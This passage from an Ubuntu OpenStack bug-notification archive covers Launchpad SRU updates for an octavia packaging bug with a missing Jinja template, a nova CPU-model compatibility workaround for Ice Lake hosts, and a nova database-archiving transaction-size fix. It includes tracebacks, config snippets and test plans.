  But the block.db doesn't actually exist, and from then on, restarting osd.42 always fails. The only solution is to remove osd.42 and re-create it with a block.db, but Ceph takes a long time to recover from the disk delete/create operations.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/ceph/+bug/2075541/+subscriptions

From 2072526 at bugs.launchpad.net Thu Aug 1 19:03:28 2024
From: 2072526 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 19:03:28 -0000
Subject: [Bug 2072526] Re: ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template
References: <172048117744.1632970.14728166185672205369.malonedeb@juju-98d295-prod-launchpad-3>
Message-ID: <172253900828.1289263.11994448105645843570.malone@juju-98d295-prod-launchpad-3>

Please include in the test plan a comparison of the files installed by the package before and after the fix, to be sure we are not suddenly including something we shouldn't.

** Changed in: octavia (Ubuntu Noble)
       Status: Triaged => Fix Committed

** Tags added: verification-needed verification-needed-noble

--
You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2072526

Title:
  ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template

Status in OpenStack Octavia Charm:
  Invalid
Status in Ubuntu Cloud Archive:
  Triaged
Status in Ubuntu Cloud Archive caracal series:
  Triaged
Status in octavia package in Ubuntu:
  Fix Released
Status in octavia source package in Noble:
  Fix Committed

Bug description:
  [ Impact ]

  Octavia fails to provision Amphora for load balancers.
[ Test Plan ]

  Install Octavia as part of a Charmed OpenStack deployment for Caracal. Create a loadbalancer - creation will fail with the stack trace from the original bug report.

  [ Where problems could occur ]

  The fix for this is to ensure that data files in the Python source tree are included in the package installation; this is done by providing a MANIFEST to ensure that this happens; side effects are unlikely.

  [Original Bug Report]

  [Impact]

  Octavia fails to provision the amphora, the stacktrace logged is:

  Traceback (most recent call last):
    File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 52, in _execute_task
      result = task.execute(**arguments)
    File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 199, in execute
      return super().execute(
    File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 122, in execute
      agent_cfg = agent_jinja_cfg.AgentJinjaTemplater()
    File "/usr/lib/python3/dist-packages/octavia/amphorae/backends/agent/agent_jinja_cfg.py", line 34, in __init__
      self.agent_template = jinja_env.get_template(
    File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 997, in get_template
      return self._load_template(name, globals)
    File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 958, in _load_template
      template = self.loader.load(self, name, self.make_globals(globals))
    File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 125, in load
      source, filename, uptodate = self.get_source(environment, name)
    File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 214, in get_source
      raise TemplateNotFound(template)
  jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template

  When searching for a package where this file is, apt-file can't find any.
https://packages.ubuntu.com/search?searchon=contents&keywords=amphora_agent_conf.template&mode=exactfilename&suite=noble&arch=any

  This file has been around for many years - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/templates/amphora_agent_conf.template - and the code that's trying to use it hasn't really received changes during the Caracal cycle - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/agent_jinja_cfg.py

  [Environment]
  * OpenStack 2024.1 (Caracal)
  * python3-octavia 1:14.0.0-0ubuntu1~cloud0

To manage notifications about this bug go to:
https://bugs.launchpad.net/charm-octavia/+bug/2072526/+subscriptions

From 2072526 at bugs.launchpad.net Thu Aug 1 19:06:46 2024
From: 2072526 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 19:06:46 -0000
Subject: [Bug 2072526] Please test proposed package
References: <172048117744.1632970.14728166185672205369.malonedeb@juju-98d295-prod-launchpad-3>
Message-ID: <172253920675.766651.12501859677778008949.malone@juju-98d295-prod-launchpad-2>

Hello Felipe, or anyone else affected,

Accepted octavia into noble-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/octavia/1:14.0.0-0ubuntu1.1 in a few hours, and then in the -proposed repository.

Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed-noble to verification-done-noble. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-failed-noble.
In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to Ubuntu Cloud Archive. https://bugs.launchpad.net/bugs/2072526 Title: ERROR octavia.controller.worker.v2.controller_worker jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template Status in OpenStack Octavia Charm: Invalid Status in Ubuntu Cloud Archive: Triaged Status in Ubuntu Cloud Archive caracal series: Triaged Status in octavia package in Ubuntu: Fix Released Status in octavia source package in Noble: Fix Committed Bug description: [ Impact ] Octavia fails to provision Amphora for load balancers. [ Test Plan ] Install Octavia as part of a Charmed OpenStack deployment for Caracal. Create a loadbalancer - creation will fail with stack trace from original bug report. [ Where problems could occur ] The fix for this is to ensure that data files in the Python source tree are included in the package installation; this is done by providing a MANIFEST to ensure that this happens; side effects are unlikely. 
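The MANIFEST fix described in [ Where problems could occur ] presumably amounts to declaring the Jinja templates as package data. A hedged sketch of what such a MANIFEST.in rule could look like (the glob and path are assumptions inferred from the traceback; the actual Ubuntu packaging change is not shown in this bug):

```
# Hypothetical MANIFEST.in rule pulling the Jinja templates into the sdist
recursive-include octavia *.template
```

With plain setuptools, installed packages additionally need include_package_data = True (or explicit package_data entries) for such files to land on disk; whether the Ubuntu fix took that route or patched the Debian packaging instead is not stated here.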
[Original Bug Report] [Impact] Octavia fails to provision the amphora, the stacktrace logged is: Traceback (most recent call last):   File "/usr/lib/python3/dist-packages/taskflow/engines/action_engine/executor.py", line 52, in _execute_task     result = task.execute(**arguments)   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 199, in execute     return super().execute(   File "/usr/lib/python3/dist-packages/octavia/controller/worker/v2/tasks/compute_tasks.py", line 122, in execute     agent_cfg = agent_jinja_cfg.AgentJinjaTemplater()   File "/usr/lib/python3/dist-packages/octavia/amphorae/backends/agent/agent_jinja_cfg.py", line 34, in __init__     self.agent_template = jinja_env.get_template(   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 997, in get_template     return self._load_template(name, globals)   File "/usr/lib/python3/dist-packages/jinja2/environment.py", line 958, in _load_template     template = self.loader.load(self, name, self.make_globals(globals))   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 125, in load     source, filename, uptodate = self.get_source(environment, name)   File "/usr/lib/python3/dist-packages/jinja2/loaders.py", line 214, in get_source     raise TemplateNotFound(template) jinja2.exceptions.TemplateNotFound: amphora_agent_conf.template When searching for a package where this file is, apt-file can't find any. 
https://packages.ubuntu.com/search?searchon=contents&keywords=amphora_agent_conf.template&mode=exactfilename&suite=noble&arch=any This file has been around for many years - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/templates/amphora_agent_conf.template - and the code that's trying to use it hasn't really received changes during the Caracal cycle - https://opendev.org/openstack/octavia/commits/branch/master/octavia/amphorae/backends/agent/agent_jinja_cfg.py [Environment] * OpenStack 2024.1 (Caracal) * python3-octavia 1:14.0.0-0ubuntu1~cloud0 To manage notifications about this bug go to: https://bugs.launchpad.net/charm-octavia/+bug/2072526/+subscriptions From 1999814 at bugs.launchpad.net Thu Aug 1 19:34:52 2024 From: 1999814 at bugs.launchpad.net (Mauricio Faria de Oliveira) Date: Thu, 01 Aug 2024 19:34:52 -0000 Subject: [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com> Message-ID: <172254089274.1327209.5260804773523968901.malone@juju-98d295-prod-launchpad-3> Uploaded a combined SRU for Focal (ubuntu2.12) on top of the latest security update. Build-time test suite passes: ====== Totals ====== Ran: 17503 tests in 769.9099 sec. - Passed: 17448 - Skipped: 54 - Expected Fail: 1 - Unexpected Success: 0 - Failed: 0 Sum of execute time for each test: 3012.8493 sec. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. 
https://bugs.launchpad.net/bugs/1999814

Title:
  [SRU] Allow for specifying common baseline CPU model with disabled feature

Status in OpenStack Compute (nova):
  Expired
Status in OpenStack Compute (nova) ussuri series:
  New
Status in OpenStack Compute (nova) victoria series:
  Won't Fix
Status in OpenStack Compute (nova) wallaby series:
  Won't Fix
Status in OpenStack Compute (nova) xena series:
  Won't Fix
Status in OpenStack Compute (nova) yoga series:
  New
Status in nova package in Ubuntu:
  Fix Released
Status in nova source package in Bionic:
  Won't Fix
Status in nova source package in Focal:
  In Progress
Status in nova source package in Jammy:
  In Progress

Bug description:
  ******** SRU TEMPLATE AT THE BOTTOM *******

  Hello,

  This is very similar to pad.lv/1852437 (and the related blueprint at https://blueprints.launchpad.net/nova/+spec/allow-disabling-cpu-flags), but there is a very different and important nuance.

  A customer I'm working with has two classes of blades that they're trying to use. Their existing ones are Cascade Lake-based; they are presently using the Cascadelake-Server-noTSX CPU model via libvirt.cpu_model in nova.conf. Their new blades are Ice Lake-based, a newer processor that would typically also be able to run with the Cascade Lake feature set - except that these Ice Lake processors lack the MPX feature defined in the Cascadelake-Server-noTSX model.

  The result of this is evident when I try to start nova on the new blades with the Ice Lake CPUs.
Even if I specify the following in my nova.conf:

  [libvirt]
  cpu_mode = custom
  cpu_model = Cascadelake-Server-noTSX
  cpu_model_extra_flags = -mpx

  That is not enough to allow Nova to start; it fails in the libvirt driver in the _check_cpu_compatibility function:

  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 771, in _check_cpu_compatibility
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._compare_cpu(cpu, self._get_cpu_info(), None)
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 8817, in _compare_cpu
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(reason=m % {'ret': ret, 'u': u})
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Unacceptable CPU info: CPU doesn't have compatibility.
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service During handling of the above exception, another exception occurred:
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Traceback (most recent call last):
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/oslo_service/service.py", line 810, in run_service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     service.start()
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/service.py", line 173, in start
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.manager.init_host()
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/compute/manager.py", line 1404, in init_host
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self.driver.init_host(host=self.host)
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 743, in init_host
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     self._check_cpu_compatibility()
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service   File "/usr/lib/python3/dist-packages/nova/virt/libvirt/driver.py", line 777, in _check_cpu_compatibility
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service     raise exception.InvalidCPUInfo(msg)
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service 0
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service Refer to http://libvirt.org/html/libvirt-libvirt-host.html#virCPUCompareResult
  2022-12-15 17:20:59.562 1836708 ERROR oslo_service.service

  If I make a custom libvirt CPU map file which removes the mpx feature and specify that as the cpu_model instead, I am able to make Nova start - so it does indeed seem to specifically be that single feature which is blocking me. However, editing the libvirt CPU mapping files is probably not the right way to fix this - hence why I'm filing this bug, for discussion of how to support cases like this.

  Currently the only "proper" way I'm aware of to work around this right now is to fall back to a Broadwell-based configuration which lacks the "mpx" feature to use as a common baseline, but that's a much older configuration than Cascade Lake and would mean missing out on all the other features which are common to both Cascade Lake and Ice Lake. I would rather there were a way to use the Cascade Lake settings but simply remove that "mpx" feature from use.

  ----

  Steps to reproduce
  ==================

  On an Ice Lake system lacking the MPX feature (e.g. /proc/cpuinfo reporting a model of "Intel(R) Xeon(R) Gold 5318Y"), specify the following settings in the libvirt section of nova.conf:

  [libvirt]
  cpu_mode = custom
  cpu_model = Cascadelake-Server-noTSX
  cpu_model_extra_flags = -mpx

  Then try to start nova.

  Expected result
  ===============

  Nova should start, since Cascadelake-Server-noTSX is a subset of Icelake-Server-noTSX, thus allowing the use of Cascadelake-Server-noTSX as a common baseline model for both Cascade Lake and Ice Lake servers.
Actual result ============= Nova refuses to start, claiming the specified CPU model is incompatible. The "cpu_model_extra_flags = -mpx" config option does not help. Environment =========== Nova/OpenStack version: OpenStack Ussuri running on Ubuntu Focal. Specifically, nova packages are at version 2:21.2.4-0ubuntu2. Hypervisor: libvirt + KVM Other relevant notes ==================== There are some other open related bugs. The removal of the MPX feature in some Ice Lake processors has manifested in other ways as well. These bugs are primarily in regards to the missing MPX feature breaking how Ice Lake processors are detected, so the nuance is somewhat different - however, they may be worth reviewing as well. * https://gitlab.com/libvirt/libvirt/-/issues/304: bug regarding the Icelake CPU maps in libvirt not working to detect certain Ice Lakes, instead detecting them as Broadwell-noTSX-IBRS according to "virsh capabilities" due to lacking the MPX feature. (I've personally tested that removing the mpx feature from the associated CPU mapping files allows for detecting as Ice Lake, but that's not the correct way to fix this.) There is also an interesting comment on this bug at https://gitlab.com/libvirt/libvirt/-/issues/304#note_1065798706. It basically implies that rather than looking at "virsh capabilities", "virsh domcapabilities" should be used instead as it seems to more correctly identify the CPU model even if there are disabled flags like MPX. * https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064: Launchpad-side bug regarding the above issue as encountered in Ubuntu. =============== SRU Description =============== [Impact] When using IceLake CPUs alongside CascadeLake CPUs, the Nova code does not start due to comparing CPU models. It fails before even comparing the flags. Unfortunately, IceLake CPUs are detected as having compatibility with Broadwell, not CascadeLake. Using Broadwell as a common denominator disables many modern features. 
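The semantics the reporter expects from cpu_model_extra_flags can be shown with a small self-contained sketch. The feature sets below are abbreviated, illustrative samples, not the real libvirt model definitions, and this is not nova's actual code:

```python
# Illustrative sketch: treat a CPU model as a feature set, apply
# cpu_model_extra_flags ("+flag" adds, "-flag" removes), and check
# whether the host provides every remaining feature.
CASCADELAKE_NOTSX_SAMPLE = {"avx512f", "avx512vnni", "mpx", "pku", "xsavec"}
ICELAKE_HOST_SAMPLE = {"avx512f", "avx512vnni", "pku", "xsavec", "gfni"}  # no mpx

def apply_extra_flags(model_features, extra_flags):
    """Return the model's feature set after applying '+'/'-' extra flags."""
    features = set(model_features)
    for flag in extra_flags:
        if flag.startswith("-"):
            features.discard(flag[1:])   # disabled feature no longer required
        else:
            features.add(flag.lstrip("+"))
    return features

required = apply_extra_flags(CASCADELAKE_NOTSX_SAMPLE, ["-mpx"])
print(required <= ICELAKE_HOST_SAMPLE)  # True: with mpx removed, the host qualifies
```

This is exactly the behavior the reporter wanted from "-mpx": drop the one missing feature from the required baseline instead of rejecting the whole model.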
The libvirt upstream team will not add specific support for Ice Lake [1]. The fix [2] in Nova is to skip the CPU check (as a configurable workaround) and let libvirt handle the added/removed flags, which is assumed to work for this specific case.

  [Test case]

  Since we do not have Icelake and Cascadelake CPUs in our usual lab for testing this specific scenario, the test case for this SRU could be either:

  1) running the charmed-openstack-tester [1] against the environment containing the upgraded package (essentially as it would be in a point release SRU) and expecting the test to pass. Test run evidence will be attached to LP.

  2) manually deploying nova and the necessary openstack services to get Nova to the code point that validates the issue on a single node. I already achieved this and was able to test the fix by hacking the node code to bypass the need for other services (conductor, keystone, mysql, etc), but for a proper validation a clean installation (without any hackery) is considered mandatory. In that case, the test case would be:

  a) Deploy nova and the required services on an IceLake machine

  b) Make sure nova.conf has:

     cpu_mode = custom
     cpu_models = Cascadelake-Server-noTSX
     cpu_model_extra_flags = -mpx

  c) Check /var/log/nova/nova-compute.log for a successful nova-compute service boot. Without the fix it will not start properly, presenting the error:

     2024-07-08 15:08:48.378 8399 CRITICAL nova [-] Unhandled error: nova.exception.InvalidCPUInfo: Configured CPU model: Cascadelake-Server-noTSX is not compatible with host CPU. Please correct your config and try again. Unacceptable CPU info: CPU doesn't have compatibility.

  d) Install the package containing the fix and confirm a successful nova-compute service restart, no longer showing the error and showing this instead:

     2024-07-09 19:41:31.806 243487 DEBUG nova.virt.libvirt.driver [-] cpu compare xml: Cascadelake-Server-noTSX

  [Regression Potential]

  There is 1 new behavior introduced and 1 changed.
The behavior introduced is gated by a new config option that needs to be enabled; when enabled, it skips running the check. The behavior changed is the one assumed by the default (disabled) value of the config option.

  The code being backported to Yoga through Ussuri is exactly the same as in current master (Caracal+), which means no issues have been found with it across 4 releases, giving some confidence that the changed code is unlikely to cause issues.

  [Other Info]

  [1] https://bugs.launchpad.net/ubuntu/+source/libvirt/+bug/1978064
  [2] https://review.opendev.org/c/openstack/nova/+/871969

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1999814/+subscriptions

From 2024258 at bugs.launchpad.net Thu Aug 1 20:13:41 2024
From: 2024258 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 20:13:41 -0000
Subject: [Bug 2024258] Re: Performance degradation archiving DB with large numbers of FK related records
References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4>
Message-ID: <172254322204.860175.8486466079445438316.malone@juju-98d295-prod-launchpad-2>

Hello melanie, or anyone else affected,

Accepted nova into jammy-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/3:25.2.1-0ubuntu2.7 in a few hours, and then in the -proposed repository.

Please help us by testing this new package. See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed-jammy to verification-done-jammy. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification-failed-jammy.
In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. ** Changed in: nova (Ubuntu Jammy) Status: In Progress => Fix Committed ** Tags added: verification-needed verification-needed-jammy ** Changed in: nova (Ubuntu Focal) Status: In Progress => Fix Committed ** Tags added: verification-needed-focal -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. 
Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionalities. 
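The per-"tree" strategy described in [Fix] can be sketched against a toy sqlite3 schema. Table names echo nova's, but the schema and SQL are heavily simplified illustrations of the transaction shape, not nova's actual archive code:

```python
# Each soft-deleted parent row and its child rows are moved to shadow
# tables in their OWN transaction, instead of batching max_rows parents
# into one huge transaction (the old behavior that hit size limits).
import sqlite3

db = sqlite3.connect(":memory:")
db.executescript("""
CREATE TABLE instances (id INTEGER PRIMARY KEY, deleted INT);
CREATE TABLE instance_faults (id INTEGER PRIMARY KEY, instance_id INT);
CREATE TABLE shadow_instances (id INTEGER PRIMARY KEY, deleted INT);
CREATE TABLE shadow_instance_faults (id INTEGER PRIMARY KEY, instance_id INT);
INSERT INTO instances VALUES (1, 1), (2, 1), (3, 0);
INSERT INTO instance_faults VALUES (10, 1), (11, 1), (12, 2);
""")

def archive_one_tree(conn):
    """Archive one deleted parent plus its children; return rows moved."""
    row = conn.execute(
        "SELECT id FROM instances WHERE deleted = 1 ORDER BY id LIMIT 1"
    ).fetchone()
    if row is None:
        return 0
    (iid,) = row
    with conn:  # one small transaction per parent "tree"
        moved = conn.execute(
            "INSERT INTO shadow_instance_faults "
            "SELECT * FROM instance_faults WHERE instance_id = ?", (iid,)).rowcount
        conn.execute("DELETE FROM instance_faults WHERE instance_id = ?", (iid,))
        conn.execute("INSERT INTO shadow_instances "
                     "SELECT * FROM instances WHERE id = ?", (iid,))
        conn.execute("DELETE FROM instances WHERE id = ?", (iid,))
        return moved + 1

total = 0
while (n := archive_one_tree(db)):
    total += n
print(total)  # 5: parents 1 and 2 plus their three fault rows
```

Because each transaction now contains one parent tree, its size is bounded by the largest single tree rather than by max_rows, which is what keeps it under limits like MySQL's group replication transaction size cap.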
[1] https://bugs.mysql.com/bug.php?id=84785 [Original Bug Description] Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows. Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made. To manage notifications about this bug go to: https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions From 2024258 at bugs.launchpad.net Thu Aug 1 20:15:19 2024 From: 2024258 at bugs.launchpad.net (Andreas Hasenack) Date: Thu, 01 Aug 2024 20:15:19 -0000 Subject: [Bug 2024258] Please test proposed package References: <168694028395.3457306.2953697720271926959.malonedeb@juju-98d295-prod-launchpad-4> Message-ID: <172254331941.863444.8702009964003126543.malone@juju-98d295-prod-launchpad-2> Hello melanie, or anyone else affected, Accepted nova into focal-proposed. The package will build now and be available at https://launchpad.net/ubuntu/+source/nova/2:21.2.4-0ubuntu2.12 in a few hours, and then in the -proposed repository. Please help us by testing this new package. 
See https://wiki.ubuntu.com/Testing/EnableProposed for documentation on how to enable and use -proposed. Your feedback will aid us getting this update out to other Ubuntu users. If this package fixes the bug for you, please add a comment to this bug, mentioning the version of the package you tested, what testing has been performed on the package and change the tag from verification-needed- focal to verification-done-focal. If it does not fix the bug for you, please add a comment stating that, and change the tag to verification- failed-focal. In either case, without details of your testing we will not be able to proceed. Further information regarding the verification process can be found at https://wiki.ubuntu.com/QATeam/PerformingSRUVerification . Thank you in advance for helping! N.B. The updated package will be released to -updates after the bug(s) fixed by this package have been verified and the package has been in -proposed for a minimum of 7 days. -- You received this bug notification because you are a member of Ubuntu OpenStack, which is subscribed to nova in Ubuntu. https://bugs.launchpad.net/bugs/2024258 Title: Performance degradation archiving DB with large numbers of FK related records Status in OpenStack Compute (nova): Fix Released Status in OpenStack Compute (nova) antelope series: In Progress Status in OpenStack Compute (nova) wallaby series: In Progress Status in OpenStack Compute (nova) xena series: In Progress Status in OpenStack Compute (nova) yoga series: In Progress Status in OpenStack Compute (nova) zed series: In Progress Status in nova package in Ubuntu: Won't Fix Status in nova source package in Focal: Fix Committed Status in nova source package in Jammy: Fix Committed Bug description: [Impact] Originally, Nova archives deleted rows in batches consisting of a maximum number of parent rows (max_rows) plus their child rows, all within a single database transaction. 
This approach limits the maximum value of max_rows that can be specified by the caller due to the potential size of the database transaction it could generate. Additionally, this behavior can cause the cleanup process to frequently encounter the following error: oslo_db.exception.DBError: (pymysql.err.InternalError) (3100, "Error on observer while running replication hook 'before_commit'.") The error arises when the transaction exceeds the group replication transaction size limit, a safeguard implemented to prevent potential MySQL crashes [1]. The default value for this limit is approximately 143MB. [Fix] An upstream commit has changed the logic to archive one parent row and its related child rows in a single database transaction. This change allows operators to choose more predictable values for max_rows and achieve more progress with each invocation of archive_deleted_rows. Additionally, this commit reduces the chances of encountering the issue where the transaction size exceeds the group replication transaction size limit. commit 697fa3c000696da559e52b664c04cbd8d261c037 Author: melanie witt CommitDate: Tue Jun 20 20:04:46 2023 +0000     database: Archive parent and child rows "trees" one at a time [Test Plan] 1. Create an instance and delete it in OpenStack. 2. Log in to the Nova database and confirm that there is an entry with a deleted_at value that is not NULL. select display_name, deleted_at from instances where deleted_at <> 0; 3. Execute the following command, ensuring that the timestamp specified in --before is later than the deleted_at value: nova-manage db archive_deleted_rows --before "XXX-XX-XX XX:XX:XX" --verbose --until-complete 4. Log in to the Nova database again and confirm that the entry has been archived and removed. select display_name, deleted_at from instances where deleted_at <> 0; [Where problems could occur] The commit changes the logic for archiving deleted entries to reduce the size of transactions generated during the operation. 
If the patch contains errors, it will only impact the archiving of deleted entries and will not affect other functionality.

[1] https://bugs.mysql.com/bug.php?id=84785

[Original Bug Description]

Observed downstream in a large scale cluster with constant create/delete server activity and hundreds of thousands of deleted instances rows.

Currently, we archive deleted rows in batches of max_rows parents + their child rows in a single database transaction. Doing it that way limits how high a value of max_rows can be specified by the caller because of the size of the database transaction it could generate. For example, in a large scale deployment with hundreds of thousands of deleted rows and constant server creation and deletion activity, a value of max_rows=1000 might exceed the database's configured maximum packet size or timeout due to a database deadlock, forcing the operator to use a much lower max_rows value like 100 or 50. And when the operator has e.g. 500,000 deleted instances rows (and millions of deleted rows total) they are trying to archive, being forced to use a max_rows value several orders of magnitude lower than the number of rows they need to archive is a poor user experience and makes it unclear if archive progress is actually being made.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/2024258/+subscriptions

From 1999814 at bugs.launchpad.net Thu Aug 1 20:12:53 2024
From: 1999814 at bugs.launchpad.net (Andreas Hasenack)
Date: Thu, 01 Aug 2024 20:12:53 -0000
Subject: [Bug 1999814] Re: [SRU] Allow for specifying common baseline CPU model with disabled feature
References: <167112824615.38411.17486317442666564453.malonedeb@angus.canonical.com>
Message-ID: <172254317336.1315154.13539235494381279840.malone@juju-98d295-prod-launchpad-7>

Hello Paul, or anyone else affected,

Accepted nova into jammy-proposed.
